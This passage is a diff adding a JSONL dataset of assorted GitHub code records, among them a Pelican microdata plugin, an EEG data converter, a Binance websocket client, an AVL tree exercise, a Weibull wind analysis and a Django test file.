diff --git "a/526.jsonl" "b/526.jsonl" new file mode 100644--- /dev/null +++ "b/526.jsonl" @@ -0,0 +1,2168 @@ +{"seq_id":"20118979587","text":"# -*- coding: utf-8 -*-\n\"\"\"\nMicrodata markup for reStructuredText\n=====================================\n\nDirectives\n----------\n\n.. code-block:: ReST\n\n .. itemscope:: \n :tag: element type (default: div)\n\n Nested content\n\n\n :itemprop:`Displayed test `\n\n\nExamples\n--------\n\nThis reStructuredText document:\n\n.. code-block:: ReST\n\n .. itemscope: Person\n :tag: p\n\n My name is :itemprop:`Bob Smith `\n but people call me :itemprop:`Smithy `.\n Here is my home page:\n :itemprop:`www.exemple.com `\n I live in Albuquerque, NM and work as an :itemprop:`engineer `\n at :itemprop:`ACME Corp <affiliation>`.\n\n\nwill result in:\n\n.. code-block:: html\n\n <p itemscope itemtype=\"http://schema.org/Person\">\n My name is <span itemprop=\"name\">Bob Smith</span>\n but people call me <span itemprop=\"nickname\">Smithy</span>.\n Here is my home page:\n <a href=\"http://www.example.com\" itemprop=\"url\">www.example.com</a>\n I live in Albuquerque, NM and work as an <span itemprop=\"title\">engineer</span>\n at <span itemprop=\"affiliation\">ACME Corp</span>.\n </p>\n\n\"\"\"\nfrom __future__ import unicode_literals\n\nimport re\nimport six\n\nfrom docutils import nodes\nfrom docutils.parsers.rst import directives, Directive, roles\nfrom pelican.readers import PelicanHTMLTranslator\nfrom pelican.signals import initialized\n\nDEFAULT_PREFIX = \"http://schema.org\"\nMICRODATA_VOCABULARY_PREFIX = DEFAULT_PREFIX\n\nRE_ROLE = re.compile(r'(?P<value>.+?)\\s*\\<(?P<name>.+)\\>')\n\n\nclass ItemProp(nodes.Inline, nodes.TextElement):\n pass\n\n\ndef itemprop_role(role, rawtext, text, lineno, inliner, options={}, content=[]):\n match = RE_ROLE.match(text)\n if not match.group('value') and match.group('name'):\n raise ValueError('%s does not match expected itemprop format: :itemprop:`value <name>`')\n value = match.group('value')\n name = match.group('name')\n if ':' in name:\n name, href = name.split(':', 1)\n else:\n href = None\n return [ItemProp(value, value, name=name, href=href)], []\n\n\nclass ItemScope(nodes.Element):\n def __init__(self, tagname, itemtype, itemprop=None, compact=False):\n kwargs = {\n 'itemscope': None,\n 'itemtype': \"%s/%s\" % (MICRODATA_VOCABULARY_PREFIX, itemtype),\n }\n if itemprop:\n kwargs['itemprop'] = itemprop\n super(ItemScope, self).__init__('', **kwargs)\n self.tagname = tagname\n self.compact = tagname == 'p' or compact\n\n\nclass ItemScopeDirective(Directive):\n required_arguments = 1\n has_content = True\n option_spec = {\n 'tag': directives.unchanged,\n 'itemprop': directives.unchanged,\n 'compact': directives.unchanged,\n }\n\n def run(self):\n self.assert_has_content()\n itemtype = self.arguments[0]\n tag = self.options.get('tag', 'div')\n itemprop = self.options.get('itemprop', None)\n compact = 'compact' in self.options\n node = ItemScope(tag, itemtype, itemprop, compact)\n self.add_name(node)\n self.state.nested_parse(self.content, self.content_offset, node)\n return [node]\n\n\ndef visit_ItemProp(self, node):\n if node['href']:\n self.body.append(self.starttag(node, 'a', '', itemprop=node['name'], href=node['href']))\n else:\n self.body.append(self.starttag(node, 'span', '', itemprop=node['name']))\n\n\ndef depart_ItemProp(self, node):\n if node['href']:\n self.body.append('</a>')\n else:\n self.body.append('</span>')\n\n\ndef visit_ItemScope(self, node):\n tag = node.starttag().replace('itemscope=\"True\"', 'itemscope')\n self.body.append(tag)\n\n\ndef depart_ItemScope(self, node):\n self.body.append(node.endtag())\n\n\ndef visit_paragraph(self, node):\n if self.should_be_compact_paragraph(node) or (isinstance(node.parent, ItemScope) and node.parent.compact):\n self.context.append('')\n else:\n self.body.append(self.starttag(node, 'p', ''))\n self.context.append('</p>')\n\n\ndef as_method(func):\n return six.create_unbound_method(func, PelicanHTMLTranslator)\n\n\ndef set_vocabulary(pelican):\n global MICRODATA_VOCABULARY_PREFIX\n MICRODATA_VOCABULARY_PREFIX = pelican.settings.get('MICRODATA_VOCABULARY', DEFAULT_PREFIX)\n\n\ndef register():\n directives.register_directive('itemscope', ItemScopeDirective)\n roles.register_canonical_role('itemprop', itemprop_role)\n\n PelicanHTMLTranslator.visit_ItemProp = as_method(visit_ItemProp)\n PelicanHTMLTranslator.depart_ItemProp = as_method(depart_ItemProp)\n PelicanHTMLTranslator.visit_ItemScope = as_method(visit_ItemScope)\n PelicanHTMLTranslator.depart_ItemScope = as_method(depart_ItemScope)\n\n # handle compact parameter\n # TODO: find a cleaner way to handle this case\n PelicanHTMLTranslator.visit_paragraph = as_method(visit_paragraph)\n\n # Fetch settings on initialized\n initialized.connect(set_vocabulary)\n","repo_name":"noirbizarre/pelican-microdata","sub_path":"microdata/plugin.py","file_name":"plugin.py","file_ext":"py","file_size_in_byte":5023,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"61"} +{"seq_id":"38547072069","text":"from typing import List, Union, Optional\n\nfrom pydantic import AnyHttpUrl, BaseSettings, validator\n\n\nclass Settings(BaseSettings):\n SERVER_NAME: str = \"localhost\"\n SERVER_HOST: AnyHttpUrl = \"http://localhost:8000\"\n # BACKEND_CORS_ORIGINS is a JSON-formatted list of origins\n # e.g: '[\"http://localhost\", \"http://localhost:4200\", \"http://localhost:3000\", \\\n # \"http://localhost:8080\", \"http://local.dockertoolbox.tiangolo.com\"]'\n BACKEND_CORS_ORIGINS: List[AnyHttpUrl] = []\n\n @validator(\"BACKEND_CORS_ORIGINS\", pre=True)\n def assemble_cors_origins(cls, v: Union[str, List[str]]) -> Union[List[str], str]:\n if isinstance(v, str) and not v.startswith(\"[\"):\n return [i.strip() for i in v.split(\",\")]\n elif isinstance(v, (list, str)):\n return v\n raise ValueError(v)\n\n PROJECT_NAME: str = \"Response Cache API\"\n PROJECT_DESCRIPTION: str = \"Cache responses from different API servers.\"\n PROJECT_VERSION: str = \"0.0.1\"\n\n API_KEYS: List[str] = []\n API_KEY_NAME: str = \"api_key\"\n\n @validator(\"API_KEYS\", pre=True)\n def assemble_api_keys(cls, v: Union[str, List[str]]) -> Union[List[str], str]:\n if isinstance(v, str) and not v.startswith(\"[\"):\n return [i.strip() for i in v.split(\",\")]\n elif isinstance(v, (list, str)):\n return v\n raise ValueError(v)\n\n REDIS_HOST: str = \"localhost\"\n REDIS_PORT: int = 6379\n REDIS_DATABASE: int = 0\n REDIS_PASSWORD: Optional[str]\n\n # AIOHTTP\n AIOHTTP_USERAGENT: str = f\"response-cache-api ({PROJECT_VERSION})\"\n\n class Config:\n case_sensitive = True\n\n\nsettings = Settings()\n","repo_name":"mhajder/response-cache-api","sub_path":"settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":1654,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"14619696918","text":"# coding: utf-8\n\nimport mne\nimport eeghdf\nimport eegvis.stacklineplot as stackplot\nimport matplotlib\nimport matplotlib.pyplot as plt\n\n#%% # data path\nDATAPATH='/mnt/home2/clee/code/eegml/eeghdf/data'\n#%%\n# check versions\n\nprint('matplotlib.__version__')\n#%%\nplt.rcParams['figure.figsize'] = (24,9)\n\n# start to make this into a function \n\n\ndef ehdf2mne(hf):\n \"\"\"@hf is an eeghdf Eeghdf object opened on a file\n from the stanford EEG corpus \"\"\"\n \n # start to make this into a function \n # find useful_channels\n\n useful_channels = []\n useful_channel_labels = []\n\n for ii, label in enumerate(hf.electrode_labels):\n if label.find('Mark') >= 0:\n continue\n if label.find('EEG') >= 0: # we use standard names\n useful_channels.append(ii)\n useful_channel_labels.append(label)\n\n # add ECG if there\n for ii, label in enumerate(hf.electrode_labels):\n if label.find('ECG') >= 0:\n useful_channels.append(ii)\n useful_channel_labels.append(label)\n\n print(list(zip(useful_channels, useful_channel_labels)))\n\n num_uchans = len(useful_channels)\n\n\n def label2type(name):\n \"\"\"lots of assumptions to use this as name is already limited\"\"\"\n try:\n if name[:6] == 'EEG Pg':\n return 'eog'\n except:\n pass\n\n if name[:3] == 'ECG':\n return 'ecg'\n if name[:3] == 'EEG':\n return 'eeg'\n return 'misc'\n\n\n\n channel_types = [label2type(label) for label in useful_channel_labels]\n print(channel_types)\n\n # now get rid of the prefixes\n uchan_names = [ss.split()[1] if ss[:3] == 'EEG' else ss \n for ss in useful_channel_labels]\n\n print('final view before sending to info')\n for ii, name in enumerate(uchan_names):\n print(ii, name, channel_types[ii])\n\n # finally remove the prefix 'EEG' from the label names\n\n\n # info - mne.create_info(unum_uchans, hf.sample_frequency)\n info = mne.create_info(uchan_names, hf.sample_frequency, \n channel_types, montage='standard_1020')\n print(info)\n\n\n #montage = 'standard_1010' # might work\n\n # start on the data\n\n data = hf.phys_signals[useful_channels, :]\n\n # MNE wants EEG and ECG in Volts\n for jj, ii in enumerate(useful_channels):\n unit = hf.physical_dimensions[ii]\n if unit == 'uV':\n data[jj, :] = data[jj, :]/1000000\n if unit == 'mV':\n data[jj, :] = data[jj, :]/1000\n\n print(data.shape)\n # TODO: transfer recording and patient details. API ref \n # url: https://martinos.org/mne/dev/generated/mne.Info.html#mne.Info\n # TODO: next need to figure out how to add the events/annotations\n info['custom_ref_applied'] = True # for SEC this is true\n\n # events are a list of dict events list of dict:\n\n # channels : list of int\n # Channel indices for the events.\n # event dict:\n # 'channels' : list|ndarray of int|int32 # channel indices for the evnets\n # 'list' : ndarray, shape (n_events * 3,)\n # triplets as number of samples, before, after.\n # I will need to see an exmaple of this\n # info['highpass'], info['lowpass']\n\n info['line_freq'] = 60.0\n\n # info['subject_info'] = <dict>\n # subject_info dict:\n\n # id : int\n # Integer subject identifier.\n\n # his_id : str\n # String subject identifier.\n\n # last_name : str\n # Last name.\n\n # first_name : str\n # First name.\n\n # middle_name : str\n # Middle name.\n\n # birthday : tuple of int\n # Birthday in (year, month, day) format.\n\n # sex : int\n # Subject sex (0=unknown, 1=male, 2=female).\n\n # work on adding annotations \n starts_sec = [1e-7 * t100ns for t100ns in hf._annotation_start100ns]\n mne_annot = mne.Annotations(onset=starts_sec, duration=hf._annotation_durations_sec,\n description=hf._annotation_text)\n\n customraw = mne.io.RawArray(data, info)\n customraw.set_annotations(mne_annot) \n\n\n return customraw, info, useful_channels\n\n\n\nif __name__ == '__main__':\n#%%\n hf = eeghdf.Eeghdf(DATAPATH + '/absence_epilepsy.eeghdf')\n channel_number, num_samples = hf.phys_signals.shape\n print('original shape:', (channel_number, num_samples) )\n print('number channels:', hf.number_channels)\n\n#%% \n # the eeghdf annotations currently only have useful info about start\n # time and description. The duration field seems to always be cut\n # off but that may not always be the case\n # oaccording to the edf spec \n # the durations are stored as text (ascii) numbers in seconds\n # if they are null I will consider duration = 0\n\n # hf.hdf['record-0']['edf_annotations']\n\n raw, info, chans = ehdf2mne(hf)\n\n raw.plot()\n","repo_name":"eegml/eeghdf","sub_path":"experiments/eeghdf2fif.py","file_name":"eeghdf2fif.py","file_ext":"py","file_size_in_byte":4789,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"24742939014","text":"#!/usr/bin/env python\n\nfrom mcn.scraper import Exchanges, Queues, settings\nfrom mcn.mq import Producer, Message\n\nimport argparse\n\n\nparser = argparse.ArgumentParser()\n\nparser.add_argument(\n \"-F\", \"--force\",\n action=\"store_true\", help=\"Skip throttling\"\n)\n\nparser.add_argument(\"-t\", \"--timeout\", type=float, default=0)\nparser.add_argument(\"url\", nargs=\"+\")\n\n\nif __name__ == \"__main__\":\n args = parser.parse_args()\n\n producer = Producer(\n Exchanges.DOWNLOAD,\n Queues.DOWNLOAD_DOCUMENT,\n url=settings.SCRAPER_AMQP_URL,\n )\n\n for url in args.url:\n msg = Message()\n msg.update(url=url)\n msg.update_meta(timeout=args.timeout)\n headers = dict()\n if args.force:\n headers.update(skip_throttling=True)\n producer.publish(msg, persistent=True, headers=headers)\n","repo_name":"mcptr/mcn","sub_path":"mcn-scraper/examples/enqueue-document-download.py","file_name":"enqueue-document-download.py","file_ext":"py","file_size_in_byte":838,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"982900688","text":"from websockets.client import connect, WebSocketClientProtocol\nfrom websockets.exceptions import ConnectionClosed\nfrom logging import Logger, getLogger\nfrom typing import Optional, AsyncIterator, cast\nfrom orjson import loads, dumps\nfrom time import time\n\n\nclass BaseWebsocketClient:\n \"\"\"\n Websocket client class.\n \"\"\"\n\n _websocket = Optional[WebSocketClientProtocol]\n _subscriptions: set[str] = set()\n _base_url: str\n _logger: Logger\n\n def __init__(self, logger: Optional[Logger], testnet=False) -> None:\n self._base_url = (\n \"wss://testnet.binance.vision\"\n if testnet\n else \"wss://stream.binance.com:9443\"\n )\n self._logger = logger if logger else getLogger(__name__)\n\n async def _send_subscription(self, subscriptions: list[str], subscribe: bool):\n \"\"\"\n Sends a subscribe / unsubscribe message over websocket.\n \"\"\"\n if self._websocket:\n try:\n message = {\n \"method\": \"SUBSCRIBE\" if subscribe else \"UNSUBSCRIBE\",\n \"params\": subscriptions,\n \"id\": int(time() * 1000),\n }\n await self._websocket.send(dumps(message).decode(\"utf-8\")) # type: ignore\n except Exception as exc:\n self._logger.warning(f\"unable to send subscription message: {exc}\")\n else:\n self._logger.warning(\n f\"unable to send subscription: websocket is disconnected\"\n )\n\n async def _stream(self, raw_stream: bool) -> AsyncIterator[dict]:\n \"\"\"\n Provides a stream of messages received over a connected websocket.\n \"\"\"\n # defines the kind of stream: raw or combined\n url = f\"{self._base_url}/ws\" if raw_stream else f\"{self._base_url}/stream\"\n\n # connects with binance server\n self._logger.info(f\"connecting websocket: {url}\")\n async with connect(uri=url, ssl=True) as websocket:\n try:\n # handles websocket connection\n self._logger.info(f\"connected websocket: {url}\")\n self._websocket = websocket\n\n # send subscriptions if there are any\n if self._subscriptions:\n self._logger.info(f\"subscribing to streams {self._subscriptions}\")\n await self._send_subscription(list(self._subscriptions), subscribe=True)\n\n # keep waiting for messages and process them\n async for data in websocket:\n \n # just type cast Data as str for type checking properly\n message = cast(str, data)\n\n # logs the received message for debug purposes\n self._logger.debug(f\"received raw message: {message}\")\n\n # it is a subscription response\n if message.startswith('{\"return\"'):\n self._logger.debug(\"ignoring subscription response\")\n\n # it is a new data message\n else:\n # parses the json object and passes as dict\n yield loads(message)\n\n except ConnectionClosed:\n self._logger.warning(f\"disconnected websocket: {url}\")\n self._websocket = None\n\n except Exception as exc:\n self._logger.error(f\"unknown error in websocket: {exc}\")\n","repo_name":"fhassis/binance-python","sub_path":"binance_python/base_ws_client.py","file_name":"base_ws_client.py","file_ext":"py","file_size_in_byte":3462,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"15645617184","text":"import os\n\n## Project_directory\nproj_dir = './scene_text'\nresults_dir = './scene_text/results'\n\n## Scene Images Dir\nimg_dir = os.path.join(proj_dir,'img')\n\n## Binary Images Dir\nbinary_result_dir = os.path.join(proj_dir,'binary')\n\n## Ground truth .xml file paths \ntrain_xml_path = os.path.join(proj_dir,'train.xml')\ntest_xml_path = os.path.join(proj_dir,'test.xml')\n\n## Extracted ground truth paths\nclass_label_path = os.path.join(proj_dir,\"ground_truth.csv\")\n\n## OCR results :\n\notsu_text_extract_results_path = os.path.join(results_dir,\"otsu_text_extract_results_path.csv\")\nslide_otsu_text_extract_results_path = os.path.join(results_dir,\"slide_otsu_text_extract_results_path.csv\")\neval_results_path = os.path.join(results_dir,\"evaluation_results.csv\")\n\n\n# Directory Creation \nif not os.path.exists(proj_dir):\n os.makedirs(proj_dir)\n\nif not os.path.exists(results_dir):\n os.makedirs(results_dir)\n","repo_name":"sagar9926/SceneTextBinarisation","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":901,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"16638176078","text":"class Node:\n def __init__(self):\n self.data = 0\n self.left = None \n self.right = None \n self.height = 1\n\ndef calculateBF(root):\n if root is None:\n return 0\n lh = 0\n rh = 0 \n if root.left != None:\n lh =root.left.height \n if root.right != None: \n rh = root.right.height \n return lh - rh \n\ndef calculateHeight(root):\n lh = 0\n rh = 0\n if root.left != None:\n lh =root.left.height \n if root.right != None: \n rh = root.right.height \n return max(lh,rh)\n\ndef leftRotate(root): #30 \n #set \n rootRight = root.right #50\n t = rootRight.left \n \n #rotation\n rootRight.left = root\n root.right = t \n\n #height \n root.height = 1+calculateHeight(root) \n rootRight.height = 1+calculateHeight(rootRight) \n\n return rootRight\ndef rightRotate(root):\n #set \n newRoot = root.left \n t = newRoot.right \n #rotate \n newRoot.right = root \n root.left = t \n \n root.height = 1+calculateHeight(root) \n newRoot.height = 1+calculateHeight(newRoot) \n\n return newRoot\n\ndef insert(root,data): # 500,350 300,350 400,350 None,350\n if root == None:\n root= Node()\n root.data = data \n return root \n else:\n if root.data > data : \n root.left = insert(root.left,data)\n else:\n root.right = insert(root.right,data)\n root.height = 1+calculateHeight(root) \n\n bf = calculateBF(root)#30 \n if bf <= -2 and root.right.data < data : #-2 -3 -4 \n #right right \n print(root.data,\" RR \") \n return leftRotate(root)\n\n\n elif bf >= 2 and root.left.data > data: #2 3 4 5 \n #left left \n print(root.data,\" LL \")\n return rightRotate(root)\n elif bf <= -2 and root.right.data > data : \n #right left \n print(root.data,\" RL \")\n root.right = rightRotate(root.right)\n return leftRotate(root)\n \n elif bf >= 2 and root.left.data < data: #2 3 4 5 \n #left right \n print(root.data,\" LR \")\n root.left = leftRotate(root.left)\n return rightRotate(root)\n \n \n return root \n\n\ndef inorder(root): #left-root-right \n if root != None:\n inorder(root.left)\n print(root.data,\"(\",root.height,\")\",end=\" \")\n inorder(root.right)\n\n\ndef deleteNode(root,data): #200,175\n if root is None: \n return root \n \n if root.data == data :\n #0 1 child -> left \n if root.left == None : \n tmp = root.right \n del root \n return tmp\n elif root.right == None: \n tmp = root.left \n del root\n return tmp \n else:\n #2 child \n success = root.right \n while success.left != None:\n success = success.left \n root.data = success.data \n return deleteNode(root.right,success.data)\n \n elif root.data > data :\n #left \n root.left = deleteNode(root.left,data)\n elif root.data < data :\n #right \n root.right = deleteNode(root.right,data)\n \n root.height = 1+calculateHeight(root) \n\n bf = calculateBF(root)#30 \n \n if bf <= -2 and root.right.data < data : #-2 -3 -4 \n #right right \n print(root.data,\" RR \") \n return leftRotate(root)\n\n\n elif bf >= 2 and root.left.data > data: #2 3 4 5 \n #left left \n print(root.data,\" LL \")\n return rightRotate(root)\n elif bf <= -2 and root.right.data > data : \n #right left \n print(root.data,\" RL \")\n root.right = rightRotate(root.right)\n return leftRotate(root)\n \n elif bf >= 2 and root.left.data < data: #2 3 4 5 \n #left right \n print(root.data,\" LR \")\n root.left = leftRotate(root.left)\n return rightRotate(root)\n \n\nroot = None\n\n\n\nwhile True: \n print(\"\\n0 For Exit\\n1 For Add\\n2 Print\\n3 For Delete\\nEnter choice\")\n choice = int(input())\n if choice == 1 :\n \n data = int(input(\"Enter data\")) # 350 \n root = insert(root,data) # 500,350 \n elif choice == 2:\n inorder(root)\n elif choice == 0:\n exit(0)\n ","repo_name":"tejasshah2k19/23-club-ds-RK","sub_path":"avl_tree.py","file_name":"avl_tree.py","file_ext":"py","file_size_in_byte":4249,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"20568658816","text":"import random\n\n\ndef druk_kleinste_index(list, element):\n tel = list.count(element)\n print(\"{} komt {} keer voor\".format(element, tel))\n index = -1\n for i in range(tel):\n index = list.index(element, index + 1) # zo begin je op index 0 en door de loop word het telkens met 1 opgeteld\n print(\"op index\", index)\n\n\ndef main():\n # 100 getallen in lijst getal >=0 en <10\n lijst = []\n for i in range(100):\n getal = random.randint(0, 9)\n lijst.append(getal)\n # gebruiker geeft getal in. invoercontrole!\n getal = int(input(\"geef een getal in \"))\n while not (getal >= 0 and getal < 10):\n getal = int(input(\"Foutief getal ingegeven. Opnieuw ingeven \"))\n druk_kleinste_index(lijst, getal)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"SemihAltintasPXL/PXLToegepast-Informatica","sub_path":"Vakken_eerste_jaar/IT-Essentials/IT-Essentials-oefeningen/7_lists/Voorbeelden/Opgave_7.5.py","file_name":"Opgave_7.5.py","file_ext":"py","file_size_in_byte":785,"program_lang":"python","lang":"nl","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"40470796040","text":"## given sorted array, with one missing number, the first element is not missing.\n# use logn time to implement it\n\nclass Solution(object):\n def missingNumber(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n x = nums[0]\n y = x + 1\n n = len(nums)\n i, j = 0, n - 1\n while i < j:\n m = i + (j - i) // 2\n if nums[m] - m == y:\n if m != 0 and nums[m - 1] - (m - 1) == x:\n return nums[m] - 1\n else:\n j = m - 1\n else:\n i = m + 1\n\n return nums[i] - 1\n \nsol = Solution()\nnums = [1, 3, 4, 5, 6]\na = sol.missingNumber(nums)\nprint (a)\n","repo_name":"akb46mayu/Data-Structures-and-Algorithms","sub_path":"pythonPart/lu_findMissingNumber.py","file_name":"lu_findMissingNumber.py","file_ext":"py","file_size_in_byte":728,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"30604344104","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport weibull\nfrom scipy import stats\nfrom sklearn.metrics import mean_squared_error\nfrom math import sqrt\n\n\nAnios = [2015, 2016, 2017, 2018]\n\nArchivo = 'Qollpana150914-270818.csv'\ndf = pd.read_csv(Archivo, index_col= False)\ndf[\"Fecha\"] = pd.to_datetime(df[\"Fecha\"])\n# filtrando informacion por anio\ndef weib(x,n,a):\n return (a / n) * (x / n)**(a - 1) * np.exp(-(x / n)**a)\ndef weibull_inv(p):\n return np.log(-np.log(1.0-p))\n\nmask = df.Fecha.dt.year == Anios[0]\ndf15 = df.loc[mask]\nmask = df.Fecha.dt.year == Anios[1]\ndf16 = df.loc[mask]\nmask = df.Fecha.dt.year == Anios[2]\ndf17 = df.loc[mask]\nmask = df.Fecha.dt.year == Anios[3]\ndf18 = df.loc[mask]\nmes = range(1,13)\n\nmask = df16.Fecha.dt.month == 12\ndfaux = df16.loc[mask]\nanalysis = weibull.Analysis(df16[\"Viento - Velocidad (m/s)\"], unit = \"m/\")\nanalysis.fit(method='mle')\n# Capturando los parametros de weibull\nforma = analysis.stats[3]\nescala = analysis.stats[6]\ncount, bins, ignored = plt.hist(dfaux[\"Viento - Velocidad (m/s)\"],23)\nprint(max(dfaux[\"Viento - Velocidad (m/s)\"]))\nx = np.linspace(min(dfaux[\"Viento - Velocidad (m/s)\"]),max(dfaux[\"Viento - Velocidad (m/s)\"]),sum(count))\nscale = count.max()/weib(x,escala ,forma).max()\nprint(weib(x,escala,forma)*scale)\nplt.plot(x, weib(x,escala,forma)*scale)\n#plt.savefig(\"Weibpdf\"+mes+Anios+\".png\")\nplt.show()\n#******************************************************************\n#\t\t\t\t\tAnalisis de corelacion \n#******************************************************************\n#Sorting the data according to stress values and re-indexing\ndfaux = dfaux.sort_values(by='Viento - Velocidad (m/s)')\ndfaux = dfaux.reset_index(drop=True)\ndfaux['Proba'] = (dfaux.index - dfaux.index[0]+1) / (len((dfaux.index))+1)\nprint(dfaux)\ndfaux['Weibull'] = weibull_inv(dfaux['Proba'])\nw = dfaux['Weibull']\nlnsw = np.log(dfaux['Viento - Velocidad (m/s)'])\nm, lnsm0, *t = stats.linregress(lnsw,w)\nsigma0 = np.exp(- lnsm0 / m)\nprint('m=', m)\nprint('sigma0=',sigma0)\nplt.figure()\nplt.plot(lnsw,w)\nplt.plot(lnsw,w,'*')\nx = lnsw\ny = (lambda x : m * x + lnsm0)(x)\nplt.plot(x, y)\nplt.plot()\nplt.grid()\nplt.ylabel('log(-log(1 - Probability of fracture))')\nplt.title(\"Weibull Analysis of experiment data\")\nrms = sqrt(mean_squared_error(y, w))\nr, p = stats.pearsonr(y,w)\nplt.text(0,1,r\"$r^2 =$\"+\"{0:.4f}\".format(r))\nplt.text(0,2,r\"$RMSE =$\"+\"{0:.4f}\".format(rms))\n#plt.savefig(\"WeibCorr\"+mes+str(Anios)+\".png\")\nplt.show()\nprint(y.shape)\nprint(w.shape)\nprint(\"coeficiente de correlacion: \",r)\nprint(\"RMSE :\", rms)","repo_name":"Lionhardv2/Test","sub_path":"Gweib3.py","file_name":"Gweib3.py","file_ext":"py","file_size_in_byte":2565,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"18493068269","text":"from django.urls import path\nfrom . views import search, search_results, product_category\n\napp_name = 'search'\n\nurlpatterns = [\n\tpath('', search, name=\"search\"),\n\tpath('results/', search_results, name=\"search-results\"),\n\tpath('<category>/', product_category, name='category-detail'),\n]\n","repo_name":"ey7/project-four","sub_path":"search/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":286,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"69986890434","text":"import sys\n\n\nclass Node:\n\n def __init__(self, key):\n self.label = key\n self.edges = {}\n self.e_lbl = {}\n\n def get_label(self):\n return self.label\n\n def change_label(self, key):\n self.label = key\n\n def add_edge(self, v, w):\n self.edges[v] = w\n self.e_lbl[w] = v\n\n def remove_edge(self, v):\n w = self.edges[v]\n self.edges.pop(v)\n self.e_lbl.pop(w)\n\n def edge_label(self, v):\n return self.edges[v]\n\n def output_edges(self):\n return self.edges.items()\n\n def neighbors(self):\n return self.edges.keys()\n\n def neighbor_by_label(self, w):\n if w in self.e_lbl:\n return self.e_lbl[w]\n else:\n return -1\n\n\ndef trie_construction(patterns):\n trie = {0: Node(0)}\n cur_key = 1\n for pattern in patterns:\n cur_node = trie[0]\n for ch in pattern:\n v = cur_node.neighbor_by_label(ch)\n if v > -1:\n cur_node = trie[v]\n else:\n v = cur_key\n v_node = Node(v)\n trie[v] = v_node\n cur_node.add_edge(v, ch)\n cur_node = v_node\n cur_key += 1\n return trie\n\n\ndef main():\n patterns = []\n for line in sys.stdin:\n patterns.append(line.strip())\n trie = trie_construction(patterns)\n for u in trie:\n node = trie[u]\n for edge in node.output_edges():\n v, w = edge\n print(str(u) + '->' + str(v) + ':' + w)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Leoberium/BA","sub_path":"Chapter9/BA9A.py","file_name":"BA9A.py","file_ext":"py","file_size_in_byte":1576,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"3917895198","text":"from __future__ import absolute_import\nimport os\nfrom six import BytesIO\nfrom django.db import IntegrityError\nfrom sentry.testutils import TestCase\nfrom sentry.models.file import File\nfrom clims.services.file_service.csv import Csv\nfrom clims.models.file import OrganizationFile\nfrom clims.models.substance import Substance\nfrom clims.handlers import HandlerContext\nfrom commonlims.utility.test_utils import create_plugin\nfrom commonlims.utility.gemstone_sample import GemstoneSample\nfrom commonlims.utility.submission_handler import GemstoneSubmissionHandler\nfrom commonlims.test.resources.resource_bag import gemstone_csv_path\nfrom commonlims.test.resources.resource_bag import read_gemstone_csv\n\n\nclass TestSampleSubmissionCsv(TestCase):\n def setUp(self):\n plugin = create_plugin(self.organization)\n self.register_extensible(GemstoneSample, plugin)\n self.handler_context = HandlerContext(self.organization)\n\n def _create_csv_organization_file(self):\n name = os.path.basename(gemstone_csv_path())\n file_model = File.objects.create(\n name=name,\n type='substance-batch-file',\n headers=list(),\n )\n contents = read_gemstone_csv()\n file_like_obj = BytesIO(contents)\n file_model.putfile(file_like_obj)\n return OrganizationFile(name=name, organization=self.organization, file=file_model)\n\n def test_import_csv_here__with_6_gemstone_samples__6_sample_instances_created(self):\n csv = Csv(gemstone_csv_path())\n created_samples = []\n for line in csv:\n name = line['Sample ID']\n preciousness = line['Preciousness']\n color = line['Color']\n props = {\n 'preciousness': preciousness,\n 'color': color,\n }\n sample = self.app.extensibles.create(\n name, GemstoneSample, self.organization, properties=props)\n created_samples.append(sample)\n self.assertEqual(6, len(created_samples))\n\n def test_file_blob(self):\n name = os.path.basename(gemstone_csv_path())\n file_model = File.objects.create(\n name=name,\n type='substance-batch-file',\n headers=list(),\n )\n contents = read_gemstone_csv()\n file_like_obj = BytesIO(contents)\n file_model.putfile(file_like_obj)\n myfile = OrganizationFile(name=name, organization=self.organization, file=file_model)\n with file_model.getfile() as src:\n for chunk in src.chunks():\n print(type(chunk))\n print(chunk)\n\n assert 1 == 1\n\n def test_investigate_getfile(self):\n myfile = self._create_csv_organization_file()\n for ix, line in enumerate(myfile.file.getfile()):\n print(line)\n assert 1 == 1\n\n def test_import_with_organization_file(self):\n myfile = self._create_csv_organization_file()\n csv = myfile.as_csv()\n created_samples = []\n for line in csv:\n name = line['Sample ID']\n preciousness = line['Preciousness']\n color = line['Color']\n props = {\n 'preciousness': preciousness,\n 'color': color,\n }\n sample = self.app.extensibles.create(\n name, GemstoneSample, self.organization, properties=props)\n created_samples.append(sample)\n self.assertEqual(6, len(created_samples))\n assert 'gemstone1-project1' == created_samples[0].name\n\n def test_run_gemstone_sample_submission_handler__with_csv__6_samples_found_in_db(self):\n handler = GemstoneSubmissionHandler(context=self.handler_context, app=self.app)\n sample_sub_file = self._create_csv_organization_file()\n handler.handle(sample_sub_file)\n all_samples = Substance.objects.all()\n expected_sample_names = [\n 'gemstone1-project1',\n 'gemstone2-project1',\n 'gemstone3-project1',\n 'gemstone4-project1',\n 'gemstone5-project1',\n 'gemstone6-project1',\n ]\n all_sample_names = [sample.name for sample in all_samples]\n assert 